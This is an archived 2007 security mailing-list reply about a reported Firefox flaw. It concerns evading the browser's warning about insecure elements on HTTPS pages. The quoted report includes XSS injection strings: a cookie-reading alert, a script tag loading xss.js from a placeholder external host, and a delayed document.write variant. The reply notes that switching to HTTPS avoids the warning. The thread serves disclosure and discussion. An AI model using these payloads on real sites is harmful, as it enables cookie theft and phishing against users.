[VulnWatch] Re: [Full-disclosure] Mozilla Firefox Insecure Element Stealth Injection Vulnerability

From: 3APA3A (3APA3A@private)
Date: Wed Apr 04 2007 - 08:23:30 PDT


Dear Michal Majchrowicz,

 This feature is not intended to protect against XSS, it's only intended
 to  inform  you  some  information is transmitted in cleartext. You can
 simply change

 src="http://server2.com/xss.js

 to

 src="https://server2.com/xss.js

 to avoid this message.

--Wednesday, April 4, 2007, 3:29:14 PM, you wrote to full-disclosureat_private:

MM> When user visits sites over HTTPS protocol he is informed by the Web
MM> Browser everytime the site tries to load unsecured (using HTTP
MM> protocol) element (script/iframe/object etc.).
MM> So for instance if we have XSS vulnerable site
MM> https://server.com/vuln.php?id="><script>alert(document.cookie);</script>
MM> Everybrowser will execute it without any complains since they cannot
MM> know where the code comes from. But this example will cause a warning:
MM> https://server.com/vuln.php?id="><script
MM> src="http://server2.com/xss.js"></script>
MM> Web Browser knows that we are trying to load something over unsecure protocol.
MM> However Mozilla Firefox will fail with the following example and the
MM> user will think that all the elements are "safe":
MM> https://server.com/vuln.php?id="><script>setTimeout("document.write('<script
MM> src=http://server2.com/xss.js></script>',10000)"</script>
MM> The "insecure element" will be added after Web Browser performs
MM> checking therefore allowing for instance phising attacks. Internet
MM> Explorer is not vulnerable to this issue. Other Web Browser weren't
MM> tested.

MM> _______________________________________________
MM> Full-Disclosure - We believe in it.
MM> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
MM> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA http://securityvulns.com/
Машина оказалась способной к единственному действию,
а именно умножению 2x2, да и то при этом ошибаясь. (Лем)



This archive was generated by hypermail 2.1.3 : Fri Apr 06 2007 - 08:52:28 PDT